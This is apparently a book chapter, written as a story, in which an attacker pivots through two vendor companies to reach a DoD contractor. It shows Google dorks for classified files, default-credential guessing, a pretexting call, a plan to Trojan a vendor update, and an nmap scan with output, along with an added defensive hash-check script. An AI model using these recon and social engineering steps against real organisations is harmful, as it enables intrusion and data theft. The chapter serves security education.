5. Chained Corporations

Setting the Stage

One of the most overlooked security flaws is the one that can’t be measured by looking at one corporation’s network security architecture. It can’t even be measured by the best vulnerability assessment. We’re talking about attacks that originate through one company, and end in the compromise of a peripheral company. We often go to great lengths to secure our networks, tighten our applications, and lock down nodes. But few companies ever stop to look at the infrastructure of the companies they blindly allow access into their network.

Phoenix will orchestrate a complex attack where he will exploit not one but two other companies to finally penetrate his primary target.

Phoenix sits in his apartment and can’t believe the “project” he’s just had handed over to him. The instructions came in typical fashion: a typed note with very clear and precise instructions: Grethrip Harmen. Data pull - SONIC. Phoenix knows from other jobs that these instructions mean that the target is the DoD contractor Grethrip Harmon, and the task is to get as much data as possible about a (probably) top secret weapons system named SONIC. “This is freaking insane,” Phoenix whispers. He knows, based on what he’s read on various government legal sites, including http://www.cybercrime.gov, that attacking a DoD contractor is almost equal to attacking the Pentagon itself. Not to mention that trying to illegally obtain classified documents from anywhere carries heavy penalties. “This is not going to be a cakewalk,” Phoenix says. As he places the note on his desk, he grabs a notepad and starts to scribble out a preliminary plan.

The Approach

The approach Phoenix will take is as follows:

1.   Recon Grethrip and find every possible point of entry:

     Web recon to find possible Web-facing entry points.

     Visual recon to look for any potential weaknesses in physical security and operational security.

     See whether there are any trusted relationships with other companies that might have trusted connectivity to the target.

2.   Perform comprehensive deep recon on target and trusted business partners:

     Interrogate any vulnerable employees.

     Review options concerning penetrating partner companies if any exist.

     Determine what level of trust partner companies have to Grethrip.

     After levels of trust are determined, create lab environment that simulates first target.

     In a lab environment, simulate attacking first target or initial point of entry.

     Document successful attacks.

3.   Plan the attack:

     Pick primary and alternative points of entry.

     Select point of entry based on least resistance and plausibility.

     Map out attack and end goal.

4.   Attack:

     Penetrate initial target.

     Use access for elevation of privileges.

     Locate and ascertain target information.

     Obtain target data.

     Cover tracks.

The Chained Exploit

This section includes the details of each step in Phoenix’s chained exploit, including

•   Reconnaissance

•   Social Engineering Attack

•   More and Yet More Recon

•   Aggressive Active Recon

•   Building the Exploit Infrastructure

•   Testing the Exploit

•   Executing the Hack

•   Constructing the Rootkit

•   Game Over—The End Result

•   Other Possibilities

The section ends with a summary of this chained exploit.

Reconnaissance

With the rough draft of the plan in place, Phoenix’s strategy begins to take shape. Phoenix wastes no time starting his recon. He starts Firefox and goes to google.com. Phoenix thinks carefully of what his first query will be. “I wonder who has links on their Web site to Grethrip’s Web site?” With that thought, Phoenix instinctively enters the following in the search area on the Google Web site:

link: www.grethripharmon.com

Phoenix is surprised to see Google come back with only 50 results. But then it dawns on him: With Grethrip being probably the largest Department of Defense contractor in the world, it probably keeps a close watch on who links to its Web site and for what reason. Now partially satisfied with the results, Phoenix adds the results page to his favorites for later exploration and begins to go painstakingly through several more queries. Next Phoenix wants to see whether he might get any insight into the SONIC project that’s supposed to be top secret. His next Google query is as follows:

intext:classified top secret SONIC grethrip harmon

Phoenix huffs to himself as the results come back “Ha! 863 results. Top secret, my toe!” Again he methodically adds the results page to his favorites. “Let’s see whether we can cut through these results and get more precise hits back.” Phoenix modifies his query only slightly. He enters the following as his search query:

intext:(top secret | classified | grethrip harmon | sonic) filetype:doc

Although the modification is only slight, the results are deadly accurate. Phoenix’s search now is cut to 75 results and they’re all Word documents. By specifying the filetype:doc operator at the end of the query, he told Google he wanted to see only results that were Word documents. Phoenix tries a few other queries and gets mediocre results. He adds the results pages to his favorites as he did the others and moves on. “All right, let’s see what we got,” Phoenix says to himself as he goes back to the first set of results and starts to comb through them.

As Phoenix goes through the results, he notices a few news articles about Grethrip. He finds more articles talking about contract awards and other seemingly useless stuff. Then he seems to hit something useful: the 55th result in his Google query is a company named Visual IQ that’s claiming to provide customized data visualization. And it has Grethrip listed as a client. “Now we’re getting somewhere,” Phoenix says. Instinctively, Phoenix now starts to focus some of his attention on Visual IQ. Phoenix knows that it probably won’t be nearly as protected as Grethrip. Now directing his sword, which is Google, toward Visual IQ, he begins. Phoenix decides to use the anchor operator. Figure 5.1 shows the query Phoenix chose for Google. He proceeds by entering the following in Google:

inanchor:visualIQ

Figure 5.1 Google query using the inanchor operator

Phoenix has to blink twice as he sees Google come back with more than 250 results. Phoenix spends the better part of the next 30 minutes examining the results. He sees the usual articles, case studies, and so forth. But Phoenix finds one particular link very interesting. One of the links leads to an online help forum. It’s basically a place where people go to get technical help when they’re in over their heads. Phoenix finds that the IT Director of Visual IQ has been asking for help concerning configuring a Cisco router. As he continues to go through the results he finds more questions posted by this individual. Several questions have detailed network configuration information posted. Phoenix notices several posts in the forum where the person has asked for help configuring Cisco ASA firewalls. It appears that after asking for help, someone in the forum instructed him to execute a show run command and post the results. As expected, the individual followed the instructions. Phoenix has now identified the person as someone probably named Bill. Even though he used an unrelated screen name (Pokerman45), he ended his last post where he told the forum moderators thanks by using what appears to be his real name. “Thank you guys again for all your help. Bill” Phoenix knows that having the first name could help out later in any social engineering effort he might embark on.

“I wonder whether they have any job ads out there,” Phoenix asks himself. Phoenix enters www.monster.com into his browser and quickly does a search for Visual IQ. Monster comes back with no results. Not giving up too quickly, Phoenix tries another one. He goes to www.careerbuilder.com. Again he inputs Visual IQ in the search area. This time he has more luck. Twenty results come back. Phoenix immediately revises his query by adding the keyword IT to his search. Now the results are down to seven. The first result that comes back is an ad looking for an assistant IT director. The requirements are poorly put together, but Phoenix is able to get the gist of it, which is basically someone who knows a lot of Cisco and Windows Active Directory stuff. The other IT job ads aren’t really IT at all—instead they are ads looking for programmers. As Phoenix starts to put the pieces together, he begins to form a theory. “Okay, so it looks like Mr. IT Director Bill probably lied in his job interview and on his resume, took on a bunch of projects, and is now desperately looking for someone who knows everything about everything to cover his behind.”

To further verify this, Phoenix goes back to Netcraft.com and enters the Visual IQ domain. As Phoenix suspected, the person registered as the technical contact is a person named William Hynes. “There’s our Bill,” Phoenix says as he laughs lightly. Trying to more accurately get an idea of Visual IQ’s IT security capabilities, Phoenix now goes back to the online help forum and does a search using some of the IP addresses he recorded from the show run post that he saw earlier from Bill’s post. Almost instantly he gets about 60 results in the forum. As Phoenix goes through the results, he notices that the posts appear to be from different people who work inside Visual IQ. Suddenly it becomes vividly clear to Phoenix what’s going on. Visual IQ, for all intents and purposes, doesn’t really have an IT staff. What it has is a bunch of programmers (because they write software), who kind of share in IT work, and this Bill Hynes guy is someone they hired to take the load off. With Bill obviously not really being up to the task technically, he’s been on a mission to hire someone who can actually do the job for him. With this knowledge, Phoenix is gaining more confidence in his theory that Visual IQ probably doesn’t really even have security.

Phoenix decides to get a little more invasive to see what else he can uncover about Visual IQ. Glancing back at the Netcraft results from earlier, Phoenix notices that Visual IQ probably hosts some of its own DNS servers as well. With that thought in mind, Phoenix has another quick brainstorm. “I wonder if it hosts any FTP servers?” Phoenix enters ftp.visualiqiq.com into his browser and is immediately prompted with a username and password prompt. Phoenix quickly glances back at the Bill Hynes posts he saved from earlier. He first tries the handle pokerman as the username and the same for a password. He’s greeted with an invalid username or password message box. Without hesitating, and as the urgency starts to sink in, Phoenix begins to go through his list of most commonly used usernames and passwords. He first tries the administrator/password combination. No luck. Next he enters test for the username and test for the password. Phoenix starts cackling as he is greeted with a large directory listing. Lo and behold, there’s one directory named Grethrip.

Phoenix pauses for a few seconds and tries to imagine what’s in these directories. Any other time Phoenix would be much more careful and probably wouldn’t dream of brute-force guessing a username and password, and certainly wouldn’t open folders on a compromised server in this fashion. But Phoenix knows he’s short on time. He opens the directory named Grethrip and sees that it contains only one file. It’s an executable with a long name. Phoenix studies the file for a moment. 100808full.exe. Phoenix grew up with a father who’d retired from the Air Force before he was born. His father was a crypto specialist in the Air Force and subjected Phoenix to enough math and crypto to make a normal child insane. But at this very moment it pays off some for Phoenix. Without missing a beat, Phoenix quickly makes the connection to the filename. “Today is October 18, 2008, so that file was probably created on October 8, 2008; that is, 10-08-08.” Phoenix is pretty sure he’s right.

But what is the file and what is it for? Phoenix downloads a copy of the file. He opens the binary in IDA Pro. Phoenix has sworn by IDA Pro since his days in college, and his dependence on it has only grown since he’s been in the world of illegal hacking. Watching the executable 100808full.exe run in IDA Pro several times and pausing it occasionally, Phoenix realizes the executable simply extracts some compressed files included in the package and puts them in a certain directory. After that it installs another small program, which appears to be named Quizzi. It’s looking for a directory named C:\Program Files\VIQ\Data. Phoenix studies the path for a brief moment and then jumps back to his browser and opens a new browsing tab. He goes to Google and quickly throws together the following query.

intext:(VIQ | visualiq | program files viq)

The first result in the Google query is exactly what Phoenix is looking for. It’s a link to a downloadable executable named VIQv5.exe housed on Visual IQ’s Web page. Phoenix quickly clicks the link and begins to download the file. He runs the executable and accepts all the defaults, one of which catches his attention: “Please select a directory to install Visual IQ.” Phoenix knows he’s got the right stuff when he sees the default path to be created is C:\Program Files\VIQ. Phoenix clicks Next and lets the program installation finish. Phoenix now opens Windows Explorer and browses to the Program Files directory on his C: drive to see whether he can figure out exactly what the program has installed. He notices a new folder named VIQ inside the Program Files directory. Phoenix drills down one more level, opening the VIQ directory. He’s delighted to see that the folder named Data is sitting right there. “Cool!” Phoenix shouts.

With the Visual IQ program installed, Phoenix clicks Start on his desktop and notices a new program named VIQ. He clicks on the icon and is greeted with a Welcome message. “Thank you for choosing Visual IQ. Please enter your license key or click Continue to proceed in demo mode.” He clicks Continue and is greeted with a drag and drop Windows Explorer–type user interface. Phoenix looks up at the menu bar and clicks the File drop-down. There are several options under File, including Open, Save, and a few others. The two that catch Phoenix’s attention are Load New Data and Visualize Data. Phoenix selects the Visualize Data option and is promptly greeted with a message box that reads No data loaded to display. “Now I got it,” Phoenix says. “These guys create these customized visualization templates that run on their software.”

Apparently Grethrip has purchased the software and uses it for data visualization purposes. Based on the titles of some of the fields in the templates, Grethrip appears to be visualizing some kind of chemical reaction or biological reaction measurement and analysis process. It appears that Visual IQ is constantly updating the templates for Grethrip, and it probably makes the updates available to Grethrip via FTP. If Grethrip is as paranoid as it appears to be, it certainly wouldn’t allow Visual IQ to actually push any updates to Grethrip. “Now it’s starting to come together,” Phoenix says as he thinks out loud. With that familiar rush of progress coming over Phoenix, he realizes that he just might have found his way inside. If he could somehow get access to the next Visual IQ update before Grethrip pulls it from the Visual IQ FTP server, he might be able to get something inside Grethrip that would lead to some kind of access. Phoenix realizes he needs to do a lot more recon on Visual IQ if he is to pull this off successfully. Without wasting any more time, Phoenix starts to assemble his favorite recon tools. First Phoenix wants to double-check the e-mail address that Bill Hynes provided at his domain registrar. Phoenix reviews the results of his Netcraft findings and sees the address is [email protected]. So, he opens up one of his favorite tools: 1st Email Spider. Phoenix inputs the appropriate strings as shown here. Figure 5.2 shows the population of the 1st Email Spider user interface.

Figure 5.2 Phoenix’s population of the 1st Email Spider user interface

The results come back quickly and show that Bill Hynes has the e-mail address plastered all over the place. So, it must be good. “Let’s see whether I can find any interesting files on that Web server,” Phoenix says as he opens My IP Suite. He clicks the Web site scanner button on the left and inputs www.visualiqiq.com in the Scanner field. Figure 5.3 shows the population of My IP Suite.

Figure 5.3 My IP Suite being populated to scan the Visual IQ domain

Phoenix is pretty happy when it comes back with more than 700 files stored on the Web server. One area looks particularly interesting. Phoenix sees a large list of sequentially numbered PDF files. See Figure 5.4 for the results.

Figure 5.4 Part of Phoenix’s scanner results

Phoenix wonders whether these PDF files are protected or if they’re just out there world-readable. Phoenix goes to his browser and opens a new tab. He inputs the URL of the first PDF he sees hosted on Visual IQ’s domain:

http://www.visualiqiq.com/w2k-1.pdf

The PDF opens right up. Phoenix can’t believe his eyes! It’s instructions on how to download updates from the FTP site. This particular PDF is for another client—some college. The PDF includes the URL, username, and password information. “Sweet,” Phoenix yells. “Now all I have to do is find the PDF that’s related to Grethrip.” But Phoenix realizes that could take a long time considering there are about 300 PDFs there. He suddenly has an idea: “I’ll just take them all, merge them into one PDF, and do a search for Grethrip inside Adobe.”

Phoenix quickly downloads all the PDFs and opens the first one in Adobe. He then clicks on the Pages tab on the left and sees all the pages in the first PDF listed. Next he browses his C drive to the directory where he’s saved all the downloaded PDFs. He holds down the Shift key on his keyboard, selects the first PDF and the last one, thereby selecting the first and last one plus all the ones in between. Phoenix now drags his cursor over his Adobe instance, and it pops back up as the active window. He then drops all the selected PDFs after the last page being displayed in the Pages view in Adobe. Adobe flashes a percentage indicator and within 5 seconds, it’s finished. Phoenix examines the page list now and sees that the PDF has more than 350 pages. Next Phoenix clicks the search icon in Adobe and enters the name Grethrip. Almost instantaneously he has a hit. Page 279 is where Adobe takes him. And right there in plain black-and-white is the username and password required to access the Grethrip folder on the Visual IQ FTP site. Phoenix knows he could pull this off using only the test account, but for auditing and other things, he knows it would make it more difficult to track down an intrusion if he used an account that’s regularly used to access the FTP site. “Okay, relax, Phoenix. Don’t get ahead of yourself,” Phoenix says to himself. “There’s still more recon that needs to be done.”

Phoenix is now ready to get more comprehensive in his recon efforts against Visual IQ and opens another of his favorite tools. He grabs a little-known tool named SpiderFoot. SpiderFoot grabs information about target domains, subdomains, hosts, and a host of other information. SpiderFoot uses a combination of DNS, Netcraft, Whois, and several other information repositories to compile and present its information. Phoenix hasn’t used SpiderFoot in a while, so he decides to give it a refresher drive against a site he knows. He opens the SpiderFoot program and enters a test URL. Phoenix checks all the tabs to the right and clicks Start. The results are plentiful and do the job of jolting Phoenix’s memory. Phoenix calmly watches as SpiderFoot combs through the Web for information about the test target domain he’s entered. See Figure 5.5 to view SpiderFoot working.

Figure 5.5 SpiderFoot digging for domain information

Social Engineering Attack

Phoenix promptly replaces his test domain name with that of Visual IQ and continues to go through his recon tool chest. Phoenix looks through his tools and realizes he’s going to run out of time. He takes a leap forward and decides to go active. Phoenix goes back to Visual IQ’s Web site and locates the Contact Us page. He finds the general contact number and dials it on his cell phone. A chirpy voice answers: “Thank you for calling Visual IQ, how may I direct your call?” Phoenix clears his throat and replies, “I would like to speak with Bill Hynes, please.” The receptionist replies, “One moment please.” Phoenix hangs up the phone. Now he knows there really is a Bill Hynes there, and he knows that his phone calls are not screened.

Phoenix comes up with a plan and a strategy on how to get information out of Bill when he calls back a second time. Phoenix remembers seeing a link titled Executive Bios on the left side of Visual IQ’s Web site. Revisiting that page Phoenix sees that there are five executives listed. He quickly jots down the names and grabs his cell phone again. He hits the Redial button and calls Visual IQ’s general phone number again. Greeted by the same chirpy voice he again asks to speak to Bill Hynes. The receptionist replies and within moments, a weathered scratchy voice on the other end pops out of Phoenix’s cell phone. “This is Bill Hynes speaking.” Phoenix clears his throat and replies. “Hi, this is Felix Jones. I work for a Web research company. I was in a dinner with Jack English of your company about data visualization solutions, and he thought your company’s product might provide what we need. I’ve already spoken to your sales team, and they gave me all the pricing information I need and a very good overview of the product. I had some technical questions and they referred me to you to answer those. Any chance you have time to help?” Bill knows that he gets a bonus commission any time he gives someone technical guidance, and they end up buying Visual IQ. “Sure, what kinds of questions do you have?” Phoenix starts his assault. “Well, I wasn’t sure about just how much you guys can customize the product, and I wasn’t clear on exactly how fast and efficient the update process is. Let’s say I wanted a change implemented in our data package. How would I go about requesting that? How would I get the updates? And, most importantly, how fast?” Phoenix stops and catches his breath as he waits for Bill to respond.

Bill shoots back. “Basically the update process is pretty painless, and you’ll have a lot of control over how fast you get the updates. We usually turn around update requests in about 72 hours. As far as how you get them, when you purchase the product we create a share for you on our FTP site and give you access to it. As we update your solution, we post a self-extracting executable that includes your updates on the FTP share to which only you and I have access. You simply download it, run the executable, and your product is updated.” As Bill pauses, Phoenix chimes in. “Okay, that sounds painless enough. Is there any chance of getting the versions mixed up and accidentally installing an older version?” Bill jumps at the opportunity to answer this question. “Actually, that won’t happen. We do projects for a large DoD contractor, and part of the requirements it mandated was that all our executables have something called an MD5 checksum associated with it. After we create the file, we run this mathematical process against it. The MD5 process generates a mathematical fingerprint of the data that can be derived again only by running the same mathematical process against the exact same piece of data. We don’t put this number out on the FTP or make it available. We e-mail it to the client, and they run the comparison on their end once they have the executable. It’s called a hash. It’s great for making sure the executable hasn’t been corrupted, but for the DoD guys, they wanted to make sure the file wasn’t modified or replaced with a virus version in transit.”

Phoenix is almost demoralized. His plan was to do a simple Trojan wrap inside the executable used for the updates. The plan was quite simple: Wait for Visual IQ to post an update for Grethrip, pull down a copy of the update, wrap a Trojan inside it before Grethrip downloads it, and then sit back and wait for someone inside Grethrip to download the executable and run it, which would thereby install whatever Trojan or keylogger he merged inside it. Phoenix hadn’t really decided what to put there yet, but he was flirting with the idea of wrapping a RAT (remote access Trojan) inside the executable. The RAT would initiate a connection back out to a control server Phoenix would set up on the Web. Because the connection would be initiated from the inside, most firewall technologies would be useless. Phoenix thinks before responding again to Bill, and then closes the conversation. “That sounds like exactly what we’re looking for. I’ll get back in touch with your sales team and arrange a demo and possibly place my order.” Bill replies, “Okay, glad I could help. Please call back again if you have questions.” “Sure thing,” Phoenix mumbles back.
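The control that stops Phoenix’s first plan is the out-of-band digest Bill describes: the update file travels over FTP, the fingerprint travels separately by e-mail, and the client recomputes the fingerprint before running anything. The script below is an added example, not code from the chapter or from Visual IQ, showing the client side of that check. The update bytes, the file name and the “tampered” copy are constructed here for the demonstration. The chapter’s scheme uses MD5; the example defaults to SHA-256, since MD5 collisions are practical today, but the algorithm is a parameter so the MD5 flow from the story is exercised as well.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed stand-in for a vendor's self-extracting update executable.
# The real 100808full.exe from the chapter is not reproduced here.
SAMPLE_UPDATE = b"MZ\x90\x00 demo update payload v5 (constructed sample)\n"


def file_digest(path: str, algorithm: str = "sha256", chunk_size: int = 1 << 16) -> str:
    """Hash a file in fixed-size chunks so a large update never has to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_update(path: str, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Return True only if the file's digest equals the value received over a separate channel.

    compare_digest runs in constant time, so a caller exposing this check remotely
    would not leak how many leading characters of the digest matched.
    """
    actual = file_digest(path, algorithm)
    return hmac.compare_digest(actual.lower(), expected_hex.strip().lower())


def demo() -> dict:
    """Write the constructed update to a temp dir and check a pristine and a tampered copy.

    Models the chapter's flow: the vendor publishes the file on FTP (the temp dir here)
    and e-mails the digest; the client recomputes it before running the executable.
    """
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "100808full.exe")
        with open(good, "wb") as fh:
            fh.write(SAMPLE_UPDATE)

        # Vendor side: digests that would be sent out of band, never alongside the file.
        published_sha256 = file_digest(good, "sha256")
        published_md5 = file_digest(good, "md5")

        # Threat model from the chapter: the file on the share is swapped for a modified
        # one. Here a single byte differs; any change flips the digest.
        bad = os.path.join(tmp, "100808full_tampered.exe")
        with open(bad, "wb") as fh:
            fh.write(SAMPLE_UPDATE.replace(b"v5", b"v6"))

        return {
            "published_sha256": published_sha256,
            "published_md5": published_md5,
            "pristine_ok": verify_update(good, published_sha256),
            "pristine_md5_ok": verify_update(good, published_md5, "md5"),
            "tampered_ok": verify_update(bad, published_sha256),
            "wrong_digest_ok": verify_update(good, "0" * 64),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check only helps if the digest really does arrive over a channel the attacker cannot also rewrite; a digest posted next to the file on the same FTP share protects against corruption but not against the substitution Phoenix had in mind. A signed manifest (vendor signature over the file hash) closes that gap without depending on e-mail.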

More and Yet More Recon

When Phoenix hits the end button on his cell phone, he jumps out of his seat and unloads a barrage of profanities. “What now?” Phoenix yells. His initial plan has pretty much just been shot down. “I must find another way. I need to go back and do more recon.” Phoenix has an idea. He realizes that his initial plan of piggybacking off the trust between Grethrip and Visual IQ is flawed, but he wonders what relationships Visual IQ has with other companies. So, he decides to revisit his recon and find out what other relationships might have been overlooked. Going back through his recon notes and findings, Phoenix is on the borderline of frustration. He’s been combing through his recon and firing off new Google queries for the last 4 hours when something hits him like a shot of adrenaline. Phoenix remembers seeing a name in his IDA Pro test: Quizzi. He also remembers browsing over that name somewhere else in his earlier recon. When Phoenix did the Google link:www.visualiqiq.com search string in Google, he remembers briefly seeing something about the Quizzi company in one of the hits he got back.

Phoenix goes back once more to his earlier Google recon on Visual IQ, and it’s not long before he finds the result he was looking for. In the fifteenth hit back from the link: query on Visual IQ, he finds that the Web site http://www.quizzisoftware.com has a link to Visual IQ’s Web site. Phoenix browses to the Quizzi Web site and begins to read. What Phoenix finds is that Quizzi is a partner and reseller for Krystal Reporting, a well-known data querying and presentation company. Phoenix notices that the Quizzi Web site is not well organized at all. As a matter of fact, it’s hard to decipher what the company actually does. Phoenix spends another 10 minutes on the Web site and decides it’s a waste of time to try and get an idea of how it’s connected to Visual IQ. It has Visual IQ listed as a client, but that’s about it. Phoenix knows he’s going to have to do some active recon to find out exactly what Quizzi does for Visual IQ. He knows a Quizzi executable ends up being packaged with all of Visual IQ’s own update executables. But how is it there? Why is it there? These questions need to be answered before Phoenix will really know what’s going on between these two companies. “I need to find out more about Quizzi.” Phoenix goes back to Quizzi’s Web page and examines the Contact Us page. He looks at the address and realizes it is based out of Chicago. Phoenix looks at the mailing address and it strikes him as odd. Knowing Chicago very well, Phoenix realizes the address, 4029 S. Cottage Grove Street, almost sounds residential. Based on instinct, Phoenix pulls up Google and clicks on the Maps link at the top of the Google search page. He enters the address from the Quizzi home page. Figure 5.6 shows the results of the search.

Figure 5.6 Google Maps initial query result

Phoenix sees the result and slightly remembers the area as a residential area where he once visited a friend. To verify, he clicks the Street View tab. Figure 5.7 shows the Street View function in Google.

Figure 5.7 Street View result of the address listed on the Quizzi Web site

Just as Phoenix thought, the address is residential. So this means that whoever these Quizzi guys are, they most likely work exclusively from their home. “I should probably do some physical recon in the area,” Phoenix says. He goes back to his Google Maps results and clicks on the Satellite View link. Phoenix knows that if he is to do proper recon, he’ll need to have some idea of what’s there before he arrives. He knows he needs to find out whether there are any trees or other natural landmarks that might be used to hide or mask his presence at the location if the need arises. Looking at the satellite view, Phoenix realizes there are several trees and what appears to be a sports field or something nearby and, apparently, a vacant lot across the street. Figure 5.8 shows the property from Google’s Satellite View.

Figure 5.8 Google Maps results seen from Satellite View

Phoenix goes back to Street View and does a 360° view of the area and address. He notices that the building right next door to the Quizzi address has an Apartment for Rent sign on the front of the building. Phoenix quickly grabs a pen and writes down the phone number listed on the front of the building. Phoenix calls the number and quickly sets up an appointment to view the apartment.

Aggressive Active Recon

A day later Phoenix arrives to view the apartment 10 minutes ahead of schedule. Phoenix knows that the apartment is a one bedroom and it’s going for $750 a month. Doing the math, a one-year lease at $750 per month comes to $9,000. Phoenix knows it’s a lot of money to waste on recon, but considering he’s getting paid in the six-figure range for this job, it’s a drop in the bucket. Of course when Phoenix gets there, he takes a fake ID with him to match the fake name he gave when he made the appointment. When Phoenix reaches the apartment, he is greeted by a gentleman who appears to be in his fifties. “Hi, you must be Gary Eckers,” the man says to Phoenix. “Yes sir, that’s me,” Phoenix replies. “Well, let me show you around the place,” the man says. “By the way, my name is Tom. I’m the person you’ll contact if you have any problems around here. I do all maintenance and other related things.” The man smiles at Phoenix. Phoenix quickly replies, “Okay that’s good to know.”

One look at the inside of the building tells Phoenix these aren’t the kinds of landlords who do background checks, credit checks, or anything of that nature. This explains why they ask for two months’ rent for a security deposit. As the man gives Phoenix the tour of the place, Phoenix constantly has his eyes fixed on the building across the street; he knows that building probably holds the answers to all the questions he has about Quizzi. Phoenix, now anxious, asks Tom what he needs to move forward and actually move into the place. Tom informs him that as soon as Phoenix brings the money he’ll have him sign the lease, give him the keys, and call it a day. With that, Phoenix pulls out 15 crisp 100 dollar bills. Phoenix hands the money to Tom, and within minutes Phoenix has signed a lease and has keys to the place. As Phoenix heads out of Tom’s office, Tom stops him and asks if he wants to use the demo furniture in the apartment or will be bringing his own. Phoenix lets Tom know that he wants to use the furniture in the apartment for a while. Tom tells him no problem, and Phoenix is out the door of Tom’s office getting ready to head to his car.

As he comes out of Tom’s office, Phoenix notices a kid, who appears to be around 13 or 14, sitting in the lobby of the apartment complex office with a laptop. Instinctively Phoenix glances at the screen as he passes by and notices that the boy is online. “Excuse me,” interrupts Phoenix. “Is there free Wi-Fi in this building?” The boy looks at Phoenix with a cautious eye, and then, as if deciding Phoenix is okay to answer, he replies, “Well, not really. Somebody has one up somewhere around here, and we get good signal strength here, so I just use it when I’m here working for my uncle.” Phoenix looks and thinks for a second. “Oh, so Tom is your uncle?” Without looking up, the boy replies yes. Then with a sly grin on his face, the boy looks up at Phoenix again. This time he has a friendlier, more trusting look. He says to Phoenix in a low tone, “Listen, I’m gonna hook you up, dude. Whoever this guy is that set up this wireless access didn’t get the message that WEP is easily crackable. He configured it with WEP encryption. Once I saw the wireless network pop up, I went to work on connecting only to find WEP there. Next I just went online and got the video from hackingdefined and followed those steps to get his key. So because you seem like a cool dude, I’m going to give you the key and the SSID so that you can use it.”

With that the kid pulls out a piece of yellow sticky paper and scribbles some stuff on it. Phoenix almost chokes when the boy hands him the piece of paper. Right there in black and white, the SSID the kid gave Phoenix made him almost scream with joy. On the paper, written above the long WEP key was the SSID—quizzi. Phoenix cannot believe how good his luck is turning out to be. This kid just handed him the gift of a lifetime! Phoenix wastes no time rushing to his car to get his laptop. He opens his trunk, grabs his notebook, and heads back inside to start work on the Quizzi wireless network. He opens his laptop and waits for Windows to load. As soon as his desktop appears, Phoenix clicks on his wireless network icon and waits for Windows to find new wireless networks. Almost immediately Windows Wireless Zero Config shows a few wireless networks detected. But the one that gets Phoenix’s adrenaline pumping is the Quizzi wireless network that shows up in his list. Phoenix instinctively double-clicks on the Quizzi wireless network and is immediately prompted to enter a network key. Phoenix enters the code given to him by the young boy moments ago. Windows flashes a message saying it’s connecting and then the message disappears. Phoenix’s wireless network at the bottom right of his screen now flashes a connected message. “Got it!” Phoenix shouts. Phoenix moves quickly to start exploring the network. Almost immediately he fires up VMware and starts a VM instance of Backtrack. Figure 5.9 shows Backtrack loaded.

Figure 5.9 Phoenix’s Backtrack VM finishes loading.

Phoenix has used Backtrack since its creation. He loves the fact that some of his favorite exploitation and exploration tools are loaded by default. And he also loves the fact that he can boot any PC from the Backtrack CD and within minutes have an entire penetration toolkit at his fingertips. Phoenix quickly prepares an Nmap scan to try and get an idea of what’s what. He first checks the IP settings that the access point has leased him via DHCP and mentally notes the gateway address. Phoenix sees it’s the typical 192.168.1.1 used for most home router setups. He pings the gateway address and gets successful replies back. “Okay, so ICMP isn’t being blocked,” Phoenix says to himself. With that knowledge Phoenix knows he doesn’t have to specify -P0, which tells Nmap to skip the ping and just scan. So, he enters a simple command:

nmap -sS 192.168.1.0/24 -T INSANE

Phoenix looks at the results and sees there appears to be only one computer up on the network. “It’s certainly a Windows box and it looks like Windows XP,” Phoenix says in his “whisper-talking-to-myself” voice.

The following are the relevant results of the first scan.

Starting Nmap 4.60 ( http://nmap.org ) at 2008-10-10 19:38 GMT
All 1715 scanned ports on 192.168.1.9 are closed

Interesting ports on 192.168.1.10:
Not shown: 1700 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1029/tcp open ms-lsa
1030/tcp open iad1
1032/tcp open iad3
1033/tcp open netinfo
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:C0:BA:A0

Nmap done: 256 IP addresses (1 hosts up) scanned in 29.462 seconds

“This could actually be Windows XP or a really locked down Windows 2003 box. Let me try OS detection.” Phoenix now fires off an OS detection scan against the identified computer. The following is the result of that scan.

MAC Address: 00:1C:BF:66:E2:0A (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows Vista
OS details: Microsoft Windows Vista or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: Vista1; OSs: Windows Vista, Windows 2003

“Dammit!” Phoenix says. “This jerk is running Vista.” Phoenix knows that most of the exploits he regularly uses on Windows boxes that aren’t fully patched probably will not work in this case. Phoenix knows that with Microsoft’s implementation of the new ASLR (Address Space Layout Randomization), buffer overflow exploits are now almost impossible. He thinks for a few minutes. Phoenix remembers reading an article about some client-side exploits that have been reported to successfully exploit Vista machines. But with that idea Phoenix faces the reality that it’s going to be hard to trick the Quizzi guy into browsing to a malicious site.

Phoenix considers running Nessus against the Vista computer to see what it might be vulnerable to, but after thinking about it for a moment he decides he needs a faster way. Phoenix decides he needs something more powerful, something that can actually do the penetration. Core Impact! Phoenix remembers listening to a webcast where the product was being demoed. “That software can check for hundreds of vulnerabilities and exploit them all in the amount of time that it takes me to do one manually.” Phoenix whips out his prepaid cell phone and calls the contact number given to him when he started this project. The phone rings only once and a scratchy voice answers. “What do you want?” says the voice on the other end. “I need a license for Core Impact,” Phoenix says. As he’s getting ready to continue and explain to the person on the other end what Core Impact is, the man interrupts him. “Check your e-mail. You should have a license key in there. Also, there’s a download link included.” Without another word, the man hangs up. Phoenix browses to Gmail and checks his account. And sure enough, there’s an e-mail from an obviously spoofed account with a subject that just reads KEY.

Phoenix opens the e-mail and copies the key. He follows the link in the e-mail and downloads Core Impact. After the download Phoenix quickly installs the software, accepting all the defaults. After successfully installing Core Impact, Phoenix starts up the program. He is presented with the welcome screen and some options that need to be configured. Looking at the startup control panel, Phoenix is amazed at the number of exploits Core comes loaded with. Figure 5.10 shows the welcome screen and default start page of Core Impact.

Figure 5.10 Core Impact on startup

After quickly getting over the amazement of all the exploits, Phoenix clicks on the New Workspace button and completes only the required information in the resulting dialog. Figure 5.11 shows the completed new workspace setup.

Figure 5.11 Core Impact new workspace setup

Phoenix clicks Next, and then clicks Next once more to accept the license agreement information. Next, Core asks him to enter a passphrase for this workspace and instructs him to move the cursor around in a small box area. Core generates an RSA key pair for the workspace and uses the mouse movement as a source of randomness for the key generation. Phoenix follows the instructions. Figure 5.12 shows the RSA key pair generation in Core Impact.

Figure 5.12 Core Impact key generation

